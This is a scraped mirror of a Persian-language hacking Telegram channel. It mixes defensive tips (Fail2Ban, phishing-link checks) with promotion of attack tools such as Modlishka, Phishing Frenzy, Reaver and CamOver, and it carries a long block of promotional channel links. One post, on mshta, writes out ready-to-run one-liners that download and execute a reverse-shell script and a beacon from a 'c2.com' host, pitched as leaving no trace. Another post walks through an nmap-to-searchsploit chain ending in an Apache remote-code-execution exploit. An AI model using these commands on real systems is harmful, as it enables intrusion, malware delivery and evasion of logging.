hack4man | Unsorted

Telegram-канал hack4man - Hack 4҉҈ Man

13157

@durov Этот пост ни в коем случае не аморален. Этот канал является фан-каналом, и мы не публикуем какой-либо аморальный #telegram_Rules #Правила_телеграма

Subscribe to a channel

Hack 4҉҈ Man

✅بانک از کانال های تخصصی : #کامپیوتر #معماری #برنامه_نویسی #کامپیوتر #مهندسی_برق و غیره هستی ⁉️

🔑پس روی گزینه ADD بزن و تا کلی کانال تخصصی و آموزشی بهت معرفی بشه 👇👇👇

🔴 لینک 1 :
/channel/addlist/xFIZJDBxex04Y2E0

🔴 لینک 2 :
/channel/addlist/h5J-zqBZ5uUzNTM0
.

Читать полностью…

Hack 4҉҈ Man

🛡 پیکربندی Fail2Ban در لینوکس: محافظت از سرور در برابر حملات brute-force در 5 دقیقه

؛Fail2Ban، لاگ‌های سرویس‌های سیستم را تحلیل می‌کند، فعالیت‌های مشکوک را شناسایی کرده و به طور خودکار آدرس‌های IP مهاجمان را مسدود می‌کند.

پیکربندی سریع:
# ایجاد فایل پیکربندی محلی

sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local

# ویرایش قوانین
sudo nano /etc/fail2ban/jail.local

پارامترهای پایه (در ابتدای فایل):
bantime = 10m       # مدت زمان مسدودسازی
findtime = 10m       # بازه زمانی تحلیل
maxretry = 5         # تعداد تلاش‌ها قبل از مسدودسازی

پیکربندی برای SSH:
[sshd]
enabled = true
port = ssh
logpath = /var/log/auth.log
maxretry = 5

اجرا و مدیریت:
# شروع و فعال‌سازی خودکار

sudo systemctl start fail2ban
sudo systemctl enable fail2ban

# بررسی وضعیت
sudo systemctl status fail2ban


# مشاهده آدرس‌های IP مسدود شده
sudo fail2ban-client status sshd


t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

🛡؛PatchMon: مدیریت متمرکز به‌روزرسانی‌ها در محیط‌های سرور

🔺این ابزار برای مدیران سیستم و تیم‌های امنیتی طراحی شده است و امکان مدیریت ایمن و متمرکز به‌روزرسانی‌ها را در سرورهای مختلف فراهم می‌کند. عوامل (agents) فقط از طریق کانال‌های خروجی با سرور PatchMon ارتباط برقرار می‌کنند، بنابراین نیازی به باز کردن پورت‌ها و مواجهه با خطرات امنیتی نیست.

قابلیت‌ها:

مدیریت متمرکز پچ‌ها در تعداد زیادی سرور

عوامل از طریق اتصالات خروجی کار می‌کنند (بدون نیاز به پورت‌های باز)

نمایش کامل وضعیت به‌روزرسانی‌ها

خودکارسازی ایمن فرآیندها


🔗 GitHub: PatchMon/PatchMon

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

📦 کتابخانه روز: PyJWT — کار با توکن‌های وب JSON

؛JWT یک استاندارد برای انتقال امن داده‌ها بین طرفین است. PyJWT یک کتابخانه برای ایجاد و اعتبارسنجی این توکن‌ها است.

نصب:
pip install pyjwt

مثال: ایجاد و بررسی توکن:

import jwt
import datetime

SECRET_KEY = "your-secret-key"


# 1. ایجاد توکن
payload = {
    "user_id": 123,
    "username": "alex",
    "exp": datetime.datetime.now(datetime.UTC) + datetime.timedelta(hours=1)
}
token = jwt.encode(payload, SECRET_KEY, algorithm="HS256")
print(f"توکن: {token}")


# 2. بررسی توکن
try:
    decoded = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
    print(f"سلام، {decoded['username']}!")
except jwt.ExpiredSignatureError:
    print("توکن منقضی شده است")
except jwt.InvalidTokenError:
    print("توکن نامعتبر است")


t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

💡ترفند: mshta - ایجاد یک شل معکوس از طریق برنامه HTML

🔺فکر می‌کنید mshta.exe فقط برای اجرای فایل‌های .hta استفاده می‌شود؟ خنده‌دار است، اما نه. این یک فایل اجرایی مخفی ویندوز است که می‌تواند جاوااسکریپت و VBScript را مستقیماً از حافظه اجرا کند. این فایل توسط مایکروسافت امضا شده است، به ندرت مسدود می‌شود و حتی زمانی که PowerShell غیرفعال است، کار می‌کند. بریم سراغش!

🔺؛mshta چه قابلیت‌هایی دارد (و چرا این موضوع عالی است)

1⃣ اجرای اسکریپت از حافظه بدون فایل روی دیسک

mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("cmd.exe /c whoami",1,true);close()

این دستور cmd.exe را اجرا می‌کند و whoami را اجرا می‌کند. بدون ایجاد فایل، بدون ثبت رویداد در Event Viewer، مستقیماً از حافظه.

2⃣ ایجاد یک شل معکوس (بدون ذخیره روی دیسک)
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("powershell -c IEX(New-Object Net.WebClient).DownloadString('http://c2.com/rev.ps1')",0,true);close()

🔺این اسکریپت را از حافظه دانلود و اجرا می‌کند. PowerShell، اگر با -ExecutionPolicy Bypass اجرا شود، در تاریخچه ثبت نمی‌شود.

3⃣ دانلود بار مفید از یک سرور از راه دور
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("certutil -urlcache -split -f http://c2.com/beacon.exe beacon.exe && beacon.exe",0,true);close()

🔺ترکیب mshta و certutil به شما امکان می‌دهد یک فایل را بدون استفاده از PowerShell دانلود و اجرا کنید.

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

🕷؛TGSpyder: ابزاری OSINT برای جمع‌آوری داده‌ها از تلگرام

یک ابزار خط فرمان (CLI) برای تحلیلگران، روزنامه‌نگاران و محققان. این ابزار، اعضا، پیام‌ها، لینک‌های دعوت و فراداده‌ها را از گروه‌ها/کانال‌های عمومی و خصوصی جمع‌آوری می‌کند. تمام اطلاعات به فرمت CSV خروجی داده می‌شوند تا تجزیه و تحلیل آن‌ها آسان‌تر باشد.

قابلیت‌ها:
جمع‌آوری لیست اعضا (در صورت امکان)
خروجی گرفتن از تاریخچه پیام‌ها
استخراج و حذف لینک‌های تکراری t.me
جستجوی کاربر بر اساس نام کاربری یا شناسه (ID)
تعیین سازنده بسته‌های استیکر بر اساس شناسه (ID) مجموعه استیکرها

نحوه نصب:

bash
git clone https://github.com/Darksight-Analytics/tgspyder.git
cd tgspyder
pip install -r requirements.txt
pip install -e .


نحوه استفاده اولیه:
bash
tgspyder /channel/examplegroup --members --chats
tgspyder --user @username
tgspyder --sticker-pack /channel/addstickers/packname

خروجی: تمام داده‌ها در پوشه‌ای به نام TGSpyder Output/ ذخیره می‌شوند و بر اساس پوشه‌ها و زمان‌بندی مرتب شده‌اند.

🔗 گیت‌هاب
t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

👩‍💻 Hydra

🔺هیدرا ابزاری است که امکان انتخاب خودکار نام کاربری و رمز عبور را برای تعداد زیادی از سرویس‌های شبکه فراهم می‌کند. این ابزار از مجموعه‌ای گسترده از پروتکل‌ها پشتیبانی می‌کند، به طور انعطاف‌پذیری برای سناریوهای مختلف قابل تنظیم است و اغلب برای بررسی امنیت اطلاعات کاربری در محیط‌های آزمایشی استفاده می‌شود. علاوه بر این، هیدرا برای خودکارسازی حملات به سرویس‌هایی که از احراز هویت پایه استفاده می‌کنند، مناسب است.

⬅️ لینک گیت‌هاب

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

👩‍💻 Modlishka

🔺؛Modlishka به شما امکان می‌دهد از یک پروکسی HTTP معکوس خودکار استفاده کنید. کاربر همچنین می‌تواند از این ابزار برای "مسموم کردن" خودکار حافظه پنهان (کش) مرورگر با استفاده از کد وضعیت HTTP 301 استفاده کند. علاوه بر این، می‌توان از آن برای جمع‌آوری آدرس‌های URL که از TLS استفاده می‌کنند، بهره برد. Modlishka از اکثر روش‌های احراز هویت چند عاملی پشتیبانی می‌کند و می‌تواند آسیب‌پذیری‌های مربوط به 2FA (احراز هویت دو مرحله‌ای) را شناسایی و برجسته کند.

⬅️ لینک به GitHub

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

💻 نقشه راه هکرها

🔺آیا آماده‌اید تا سفری هیجان‌انگیز به اعماق امنیت سایبری را آغاز کنید؟ چه به دنبال دریافت یک مدرک معتبر، آماده شدن برای دریافت مدرک لیسانس باشید، یا صرفاً بخواهید کنجکاوی بی‌پایان خود را برطرف کنید، این نقشه راه، راهنمای ارزشمندی در مسیر تبدیل شدن به یک متخصص واقعی در زمینه هک خواهد بود. اما قبل از اینکه به جزئیات بپردازیم، بیایید اهداف خود را مشخص کنیم. چه چیزی شما را جذب می‌کند: هیجان، چالش، یا شاید تصور می‌کنید که در یک شغل پیشرو در زمینه امنیت سایبری فعالیت خواهید داشت؟ انگیزه‌های شما مسیر پیش رو را تعیین می‌کنند، بنابراین بیایید مسیری را ترسیم کنیم که دقیقاً با آرزوهای شما مطابقت داشته باشد.

🐙 لینک گیت‌هاب

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

💻 ؛LOLBAS سیستم‌ها و اسکریپت‌های باینری

🔺؛Living Off The Land یک پروژه‌ای است که فایل‌های باینری، اسکریپت‌ها و کتابخانه‌های ویندوز را مستند و فهرست می‌کند که می‌توانند برای اهداف جایگزین، اغلب توسط هکرها یا تیم‌های قرمز، مورد استفاده قرار گیرند. این پروژه به عنوان یک منبع جامع برای متخصصان امنیت اطلاعات عمل می‌کند تا درک بهتری از سوء استفاده بالقوه از ابزارهای قانونی ویندوز داشته باشند.

🐙 لینک GitHu‌b

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

☑️ نکته کاربردی برای تست نفوذ: یافتن اکسپلویت‌ها در عرض چند ثانیه، بدون نیاز به اینترنت


🔻آیا سرور Apache 2.4.49 یا نسخه قدیمی‌تر Tomcat را در سرور هدف پیدا کرده‌اید؟ نیازی نیست در مرورگر بگردید و عبارت "اکسپلویت برای نسخه X" را جستجو کنید. در Kali، ابزار searchsploit وجود دارد که یک پایگاه داده محلی از اکسپلویت‌ها از Exploit-DB است و بدون نیاز به اینترنت کار می‌کند.

⚙نحوه کارکرد:
searchsploit apache 2.4.49

📌این دستور لیستی از تمام اکسپلویت‌های مربوط به این نسخه را نمایش می‌دهد: نام، مسیر فایل، نوع آسیب‌پذیری.

🔸نمونه خروجی:

Apache 2.4.49 - Path Traversal (CVE-2021-41773) | linux/remote/50383.py
Apache 2.4.49 - Remote Code Execution (CVE-2021-42013) | linux/remote/50406.py

🔹پارامترهای مفید:

جستجو بر اساس CVE:
searchsploit apache 2.4.49 --cve

🔸فقط اکسپلویت‌هایی که دارای شماره CVE هستند را نمایش می‌دهد.

🔹نمایش لینک‌های Exploit-DB:
searchsploit apache 2.4.49 -w

مفید است اگر به اطلاعات بیشتری نیاز دارید.

🔸کپی کردن اکسپلویت در پوشه فعلی:
searchsploit -m 50383

فایل /usr/share/exploitdb/exploits/linux/remote/50383.py را در پوشه فعلی کپی می‌کند.

🔸به‌روزرسانی پایگاه داده:
searchsploit -u

فقط در صورتی که به اینترنت دسترسی دارید، این دستور کاربرد دارد.

🔹چرا این روش مفید است:

1⃣ کارکرد آفلاین — نیازی نیست به مرورگر مراجعه کنید، به خصوص اگر شبکه هدف ایزوله شده باشد.

2⃣ سرعت — جستجو فقط چند میلی‌ثانیه طول می‌کشد.

3⃣ همه چیز در یک مکان — نیازی نیست در گوگل جستجو کنید و بررسی کنید که آیا اکسپلویت کار می‌کند یا خیر.

نکته از یک متخصص:

💢بعد از اسکن با nmap و تعیین نسخه‌های سرویس‌ها، همیشه آن‌ها را از طریق searchsploit بررسی کنید. این کار 30 ثانیه طول می‌کشد و می‌تواند یک بردار حمله آماده در اختیار شما قرار دهد. این روش به خصوص برای نسخه‌های قدیمی مفید است که اکسپلویت‌های عمومی برای آن‌ها وجود دارد.

⭕️ نمونه یک زنجیره عملیات:
1. nmap -sV 192.168.1.100 → مشاهده Apache 2.4.49

2. searchsploit apache 2.4.49 → یافتن RCE (اجرای کد از راه دور)

3. searchsploit -m 50406 → کپی کردن اکسپلویت

#PentestTools #Vulnerability #Cybersecurity #HackingTools #InfoSec #OfflineTools #HackingTips

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

؛Macchanger — ابزاری برای دستکاری آدرس‌های MAC

🔶؛Macchanger ابزاری است برای مشاهده، تغییر و دستکاری آدرس‌های MAC کارت‌های شبکه‌ای در سیستم‌های لینوکس.

🔷این ابزار عملکردهای مختلفی را ارائه می‌دهد، مانند تغییر آدرس به گونه‌ای که با یک سازنده خاص مطابقت داشته باشد، یا تصادفی‌سازی کامل آن.

🌐 لینک به GitHub
t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

💡 ترفند: پیدا کردن زیردامنه ها از طریق crt.sh بدون ایجاد سر و صدا

📌نمی خواهید اسکن فعال را آشکار کنید، و بررسی دستی زیردامنه، با یک دستور، تمام گواهینامه های SSL صادر شده برای یک دامنه در دسترس شما خواهد بود. crt.sh حتی زیردامنه هایی را می شناسد که در DNS ثبت نشده اند.

curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u


📌به سادگی target.com را به جای مثال وارد کنید و پس از چند ثانیه، لیستی از تمام زیردامنه هایی که تا به حال در گواهینامه ها وجود داشته اند را مشاهده خواهید کرد. بدون نصب، بدون تنظیمات، و بدون هیچ ردی در لاگ های هدف.

توجه، در هنگام اجرای دستور VPN تون باید روشن باشه. ☑️

#ترفند #امنیت_شبکه #هک
🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

💻 ؛ShodanX — ابزار پیشرفته برای تعامل با API شادان و انجام OSINT

🔺؛ShodanX یک ابزار خط فرمان قدرتمند است که برای جستجو و جمع‌آوری مؤثر اطلاعات درباره دستگاه‌های متصل به اینترنت از طریق پلتفرم شادان طراحی شده است.

🔺؛ShodanX کار با فیلترهای شادان را ساده می‌کند، از صادرات نتایج پشتیبانی می‌کند و به سرعت به کشف نقاط ورود احتمالی یا نشت داده‌ها در شبکه جهانی کمک می‌کند.

لینک به گیت‌هاب

🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

🔸️؛WEF (چارچوب بهره‌برداری از وای‌فای) — چارچوبی برای ارزیابی امنیت و حملات به شبکه‌های وای‌فای

🔹️؛WEF ابزاری جامع برای خودکارسازی تست نفوذ در شبکه‌های بی‌سیم است. امکان انجام طیف گسترده‌ای از حملات را فراهم می‌کند، از جمله ایجاد «دوقلوهای شرور» (Evil Twin)، بهره‌برداری از آسیب‌پذیری‌های WPS و رهگیری دست‌دادن‌های WPA به صورت خودکار.

🌐 لینک گیت‌هاب

🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

📚 آرشیو معتبرترین مجلات جهان

🆔 @EnglishMagazines_PDF

🔻🔻🔻🔻🔻🔻🔻🔻🔻
پکیج‌های آموزشی 2026 اینجا آپلود شد (فول رایگان)
JOIN

آموزش رایگان طراحی وب سایت + سئو حرفه ای
JOIN

آبجکتای 3DMAX رایگان
JOIN

آموزش برنامهای ویندوز
JOIN

《 طراحی پوسترهای تبلیغاتی 》 : ایده، هنر،خلاقیت
JOIN

((آموزش و کسب درآمد از تدوین و فیلمسازی ))
JOIN

جزوه پولی رایگان دانلود کن!!!
JOIN

پروکسی پرسرعت، VPN و کانفیگ (((مجانی)))
JOIN

بزرگ ترین کاریابی دانشجویی
JOIN

نحوه ساخت هرچی فکر کنی اینجاست!
JOIN

دنیای آموزش های موبایل و کامپیوتر
JOIN

مرکز تعمیرات موبایل
JOIN

رایگان استخدام شو /vip/ !!!
JOIN

آموزش 0 تا 100 هک
JOIN

دنیای آموزش های جذاب کامپیوتر
JOIN

دنیای پکیج های رایگان
JOIN

آموزش Grammer آیلتس
JOIN

صفر تا صد هوش مصنوعی و علم داده
JOIN

آموزش های جذاب برنامه نویسی
JOIN

مکالمات انگلیسی به روش کدینگ
JOIN

پروژه یابی
JOIN

تصاویر جذاب مهندسی
JOIN

علم داده و تحلیل داده
JOIN

مهندسی هوافضا و تکنولوژی جنگنده ها
JOIN

گروه معماری " چهارسوق "
JOIN

سیرتاپیاز برنامه نویسی رو قورت بده
JOIN

مکالمه‌های روزمره انگلیسی
JOIN

کلی آموزش از منابع هوش مصنوعی
JOIN

ترفند های طلایی کامپیوتر و موبایل
JOIN

مدرسه دانش و اطلاعات
JOIN

آموزش شبکه های Cisco و مایکروسات
JOIN

ایدهای دکوراسیون داخلی
JOIN

شغل دانشجویی با درآمد 3/000/000
JOIN

انواع VPN + کانفیگ نامحدود (( رایگان ))
JOIN

آموزش سخت افزار کامپیوتر و لپ‌تاپ (رایگان)
JOIN

آموزش فتوشاپ از مقدماتی تا پیشرفته
JOIN

فول پکیج های پولی رو رایگان دانلود کنید
JOIN

سیر تا پیاز هک و امنیت (( فول رایگان ))
JOIN

آموزش کامل « دستورات ترموکس هک »
JOIN

اخبار هوش مصنوعی + تکنولوژی + IT
JOIN

اسرار موفقیت و سخنان بزرگان
JOIN

آموزش طراحی لوگو ، ایلوستریتور
JOIN

انفجار اسپیکینگ و لیسنینگ
JOIN

دانلود PDF جزوات دانشگاهی
JOIN

انگلیسی 5 دقیقه ای با استاد نیتیو
JOIN

داستانهای مصور صوتی انگلیسی
JOIN

سریال روم " دنیای فیلمای خارجی "
JOIN

آرشیو کامل آبجکتهای رویت
JOIN

آبجکت های 3بعدی 3DDD
JOIN

وقتشه اکسل یاد بگیری
JOIN

ایده‌ کسب‌ وکار پول ساز
JOIN

دانشجویی و اینجا نیستی؟؟؟
JOIN

اسرار موفقیت و سخنان بزرگان
JOIN

کانال استخدامی نفت
JOIN

آموزش های رایگان کامپیوتر
JOIN

❰❰❰ انگلیسی را حرفه‌ای بیاموز ❱❱❱
JOIN

آموزش حرفه ای برنامه نویسی
JOIN

کلی فیلم امریکایی با دو زیرنویس همزمان
JOIN

مکالمات انگلیسی با ترجمه و فایل صوتی
JOIN

پکیج های پولی رایگان
JOIN

دنیای رباتیک و تازه های تکنولوژی
JOIN

گرگ والستریت کارخانه پول سازی
JOIN

وقتشه پاورپوینت را یاد بگیری
JOIN

آموزش حرفه ای برنامه نویسی و طراحی سایت
JOIN

آموزش برق صنعتی
JOIN

مقاله ❖ISI❖ با هوش مصنوعی
JOIN

برنامه نویسی و طراحی سایت
JOIN

اموزش هک غیرقانونی با (موبایل)
JOIN

آموزش های کاربردی برق صنعتی
JOIN

همه چیز درباره طراحی و توسعه وبسایت(( حرفه‌ای))
JOIN

منبع آموزش‌های Python  ( رایگان، پروژه محور+ Code)
JOIN

تجمع دانشجویان مکانیک
JOIN

آموزش مبتدی تا حرفه ای برنامه نویسی
JOIN

کدنویسی با هوش‌مصنوعی | Vibe Coding | GPT
JOIN

مجله هوش‌مصنوعی
JOIN

انگلیسی از مبتدی تا پیشرفته
JOIN

دانلود برنامه اندرویدی ها
JOIN

آموزش تکنیک های زبان انگلیسی
JOIN

آموزش برنامه نویسی از پایه (کاملا رایگان)
JOIN

صفرتاصد هوش مصنوعی و پرامپت نویسی (رایگان)
JOIN

آموزش حرفه ای برنامه نویسی پایتون (فول رایگان)
JOIN

➖➖➖➖➖➖
🌈@Armisstab
.

Читать полностью…

Hack 4҉҈ Man

WhatsApp-OSINT

این ابزار، عکس‌های پروفایل واتساپ را دریافت می‌کند، حساب‌های تجاری را بررسی می‌کند، وضعیت کاربران را تعیین می‌کند و دستگاه‌های مرتبط را از طریق رابط OSINT شرکت RapidAPI تجزیه و تحلیل می‌کند.

📁 زبان: پایتون

⭐️ تعداد ستاره‌ها: 973

⬅️ لینک گیت‌هاب

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

📊یک ترمینال، مانیتورینگ مستقل را ارائه می‌دهد – نیازی به اجرای برنامه‌هایی مانند htop، iotop، nethogs و df نیست.

🛡یک رابط کاربری مبتنی بر متن (TUI) برای مانیتورینگ سیستم، نوشته شده با زبان Rust: دارای 6 تب با نمودارها برای CPU (هر هسته به صورت جداگانه)، حافظه، دیسک‌ها، شبکه، دما و باتری؛ قابل اجرا در سیستم‌عامل‌های Linux، macOS و Windows.

🔺تب Processes: نمایش ساختار درختی فرآیندها با قابلیت فیلتر و مرتب‌سازی بر اساس هر پارامتر + امکان خاتمه دادن به فرآیندها مستقیماً از طریق رابط کاربری.

🔺تب Disk: نمودارهای تعاملی از میزان استفاده دیسک‌ها با قابلیت نمایش تاریخچه.

🔺تب Network: نمودارهای سرعت شبکه در لحظه با قابلیت بزرگ‌نمایی زمانی.

📥 لینک به گیتهاپ

📌قابلیت سفارشی‌سازی در سطح تم‌ها، ویجت‌ها و فرکانس به‌روزرسانی. از ماوس پشتیبانی می‌شود.

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

؛Phishing Frenzy — یک چارچوب برای حملات فیشینگ

🔺؛Phishing Frenzy یک ابزار قدرتمند و متن‌باز است که برای ایجاد و مدیریت کمپین‌های فیشینگ طراحی شده است.

🔺این ابزار، تمام عملکردهای لازم را برای خودکارسازی حملات فیشینگ در اختیار کاربران قرار می‌دهد، از جمله ایجاد وب‌سایت‌های جعلی، ارسال ایمیل‌های فیشینگ و ردیابی نتایج حملات.

📌لینک گیت هاپ

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

🤖 ؛PentAGI: سیستم چندعاملی برای تست نفوذ خودکار

🔺این ابزار از عامل‌هایی مبتنی بر GPT، Claude یا DeepSeek برای انجام تست نفوذ استفاده می‌کند. این عامل‌ها با ابزارهای موجود در Kali Linux (بیش از 20 ابزار) کار می‌کنند، خود تصمیم‌گیری می‌کنند و وظایف را انجام می‌دهند.

⚙ قابلیت‌ها:
معماری چندعاملی: عوامل مختلف مسئولیت‌های مختلفی مانند جمع‌آوری اطلاعات، اسکن و بهره‌برداری را بر عهده دارند.
استفاده از ابزارهای Kali (مانند Nmap، Metasploit، Hydra و غیره) از طریق تصاویر Docker.
مدل‌های کنترلی: GPT، Claude، DeepSeek (قابل انتخاب).
رابط کاربری گرافیکی زیبا + مانیتورینگ از طریق Grafana/Prometheus.
امکان مشاهده فعالیت‌های عوامل به صورت زنده.

🔗 GitHub: PentAGI

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

🔒 بلک‌بیرد (Blackbird)

👁 یک ابزار OSINT برای جستجوی ردپاهای دیجیتال بر اساس نام کاربری و آدرس ایمیل در شبکه‌های اجتماعی.

بلک‌بیرد، حساب‌ها را در بیش از 600 پلتفرم جستجو می‌کند، و با ترکیب بررسی در دسترس بودن پروفایل‌ها، فیلتر کردن نتایج و تحلیل خودکار، کارایی بالایی دارد. این ابزار از خروجی داده‌ها در قالب‌های PDF و CSV پشتیبانی می‌کند و همچنین از هوش مصنوعی برای پروفایل‌سازی اطلاعات یافت‌شده، مستقیماً از خط فرمان، استفاده می‌کند.

❗️ این ابزار برای متخصصان OSINT، محققان امنیت و تحلیلگران، برای خودکارسازی جمع‌آوری اطلاعات عمومی، بسیار مناسب است.

📱 گیت‌هاب (GitHub)

برچسب‌ها: #ابزارها #هک #امنیت

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

🔻دیگه وقتت رو با گشتن دنبال پروژه، و موقعیت شغلی، تلف نکن! از آموزش تا پروژه‌های واقعی، همه اینجا هست!
🔸فرصت رو از دست نده، همه منتظرشن!

Читать полностью…

Hack 4҉҈ Man

☑️ راهنمای‌های فوق‌العاده برای تست نفوذ

🔺مجموعه‌ای از راهنمای‌ها و چک‌لیست‌ها که برای امنیت و تست نفوذ مفید هستند. این لیست شامل مجموعه‌ای بزرگ از منابع مرتب و انتخاب‌شده است که به شما کمک می‌کند تا زمان زیادی را صرفه‌جویی کنید.

⬅️ مشاهده کنید اینجا

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

🔐 پیاده‌سازی کامل کلاینت I2P به زبان C++

📌؛I2P (پروتکل اینترنت نامرئی) یک لایه شبکه همه‌منظوره و ناشناس است.

🔺تمام ارتباطات از طریق I2P ناشناس بوده و با رمزنگاری سرتاسری محافظت می‌شوند؛ کاربران، آدرس‌های IP واقعی خود را فاش نمی‌کنند.

🔗 لینک‌ F-Droid

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

؛Reaver — ابزاری برای حدس زدن کد WPS با روش جستجوی کامل

💢 ؛Reaver یک ابزار برای هک کردن شبکه‌های بی‌سیم است.

🔺این ابزار با انجام یک حمله مستقیم به کد WPS (Wi-Fi Protected Setup)، سعی در بازیابی رمز عبور WPA/WPA2 دارد.

🔺به طور متوسط، این ابزار می‌تواند رمز عبور را از روترهای آسیب‌پذیر در طی 4 تا 10 ساعت، بسته به نوع دستگاه، قدرت سیگنال و خود کد WPS، بازیابی کند.

🐙 لینک گیت‌هاب

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

💻 ؛Tmpmail — سرویس ایمیل موقت

🔺ایمیل موقت، سرویسی است که به کاربر یک آدرس ایمیل در وب‌سایت خود برای مدت معینی ارائه می‌دهد.

🔺؛Tmpmail یک ابزار خط فرمان است که با زبان POSIX sh نوشته شده و به شما امکان می‌دهد یک آدرس ایمیل موقت ایجاد کنید و ایمیل‌ها را در آن آدرس موقت دریافت کنید.

⭕️ این مخزن از API 1secmail برای دریافت ایمیل‌ها استفاده می‌کند.

توجه داشته باشید، از این اسکریپت در ترموکس نمی تونید استفاده کنید، در محیط های لینوکس واقعی، نه شبیه ساز ها.

🌐 لینک به GitHub

t.me/Hack4Man

Читать полностью…

Hack 4҉҈ Man

🔍 چگونه یک وب‌سایت اصلی را از یک تقلبی تشخیص دهیم و از وارد کردن رمز عبور به کلاهبرداران جلوگیری کنیم

شما یک لینک دریافت می‌کنید: сбер-онлайн.xyz یا g00gle.com. به نظر می‌رسد مشابه است، اما چیزی درست نیست. کلاهبرداران ظاهر وب‌سایت‌های معروف را کپی می‌کنند، یک حرف در آدرس را تغییر می‌دهند و شما ناخواسته رمز عبور خود را در یک صفحه تقلبی وارد می‌کنید. به یاد داشته باشید. یک کلیک اشتباه می‌تواند منجر به از دست دادن حساب کاربری، پول و آرامش شما شود. در اینجا نحوه بررسی لینک‌ها بدون ریسک آورده شده است.

لینک فیشینگ چیست؟

این یک آدرس است که خود را به عنوان یک آدرس واقعی جا می‌زند. به عنوان مثال:
- g00gle.com به جای google.com
- vk.com.secure-login.ru به جای vk.com
- сбер-банк.онлайн (دامنه نامعتبر)

هدف این است که شما را وادار به وارد کردن نام کاربری و رمز عبور در یک صفحه تقلبی کنند.

🛡 بررسی گام به گام لینک

1. روی لینک قرار دهید (در رایانه)
فقط موس را روی لینک ببرید - آدرس واقعی در پایین مرورگر ظاهر می‌شود. اگر یک دامنه عجیب و غریب مشاهده کردید، روی آن کلیک نکنید.

2. لینک را نگه دارید (در تلفن)
نگه داشتن طولانی مدت روی لینک در پیام‌رسان یا مرورگر، آدرس کامل آن را نشان می‌دهد. اگر مجموعه‌ای بی‌معنی از کاراکترها یا یک دامنه مشکوک مشاهده می‌کنید، وارد آن نشوید.

3. لینک کوتاه را باز کنید
لینک‌هایی مانند bit.ly/2x3kF آدرس نهایی را پنهان می‌کنند. از سرویس‌های رمزگشایی استفاده کنید:
- Unshorten.it (آنلاین)

4. از طریق VirusTotal بررسی کنید
لینک را کپی کنید و در VirusTotal جایگذاری کنید. این وب‌سایت آن را با ده‌ها آنتی‌ویروس بررسی می‌کند و نشان می‌دهد که آیا در پایگاه داده منابع کلاهبرداری ثبت شده است یا خیر.

5. از طریق urlscan.io بررسی کنید
لینک را ارسال کنید. این سرویس به طور خودکار وب‌سایت را در یک محیط ایزوله باز می‌کند، یک اسکرین‌شات می‌گیرد، ریدایرکت‌ها و درخواست‌های شبکه را نشان می‌دهد. شما می‌بینید که لینک به کجا منتهی می‌شود، بدون اینکه خودتان آن را باز کنید.

اگر قبلاً روی لینک کلیک کرده‌اید چه باید کرد

1. هیچ داده ای وارد نکنید. تب را ببندید.

2. اگر رمز عبور را وارد کرده‌اید، فورا رمز عبور خود را در وب‌سایت اصلی تغییر دهید.

3. احراز هویت دو مرحله‌ای (2FA) را در تمام سرویس‌های مهم فعال کنید.

🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

⚠️ ؛CamOver | ابزار شناسایی و تست نفوذ دوربین‌های IP پذیر

آیا می‌دانید چقدر از دوربین‌های مداربسته در شبکه بدون محافظت هستند؟ CamOver ابزاری تخصصی برای شناسایی و بررسی آسیب‌پذیری‌های دوربین‌های IP است. 🛡️🔍

🛠️ قابلیت‌های اصلی:
🔹 اسکن هوشمند: شناسایی خودکار مدل‌های آسیب‌پذیر از برندهای معروف (مانند Hikvision، TP-Link، CCTV و غیره).
🔹 بهره‌برداری خودکار: استفاده از آسیب‌پذیری‌های عمومی و اطلاعات کاربری پیش‌فرض (Default Credentials).
🔹 دسترسی به استریم: توانایی دسترسی به جریان ویدیویی دوربین‌های محافظت‌نشده.
🔹 انعطاف‌پذیری بالا: پشتیبانی از اسکن تک‌هدف و اسکن گسترده کل زیرشبکه.

👨‍💻 مناسب برای: متخصصین امنیت، تست‌کننده‌های نفوذ و کارشناسان شبکه.

📂 لینک مخزن در گیت‌هاب:
🔗 GitHub - CamOver

⚠️ توجه: این ابزار صرفاً جهت مقاصد آموزشی و تست امنیت تهیه شده است. استفاده غیرمجاز مسئولیت بر عهده کاربر است.

#امنیت_شبکه #تست_نفوذ #هک #دوربین_دوربین #سایبر_امنیت #CyberSecurity #EthicalHacking #CamOver #IPCamera

🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

🌐؛GeoVista سامانه عاملی استدلال بصری با افزونه وب برای موقعیت‌یابی دقیق جغرافیایی

🔹️؛GeoVista یک سامانه پیشرفته مبتنی بر عامل‌های هوش مصنوعی است که برای تعیین موقعیت جغرافیایی از روی تصاویر (موقعیت‌یابی جغرافیایی) با استفاده از استراتژی‌های استدلال بصری و جستجوی خارجی طراحی شده است.

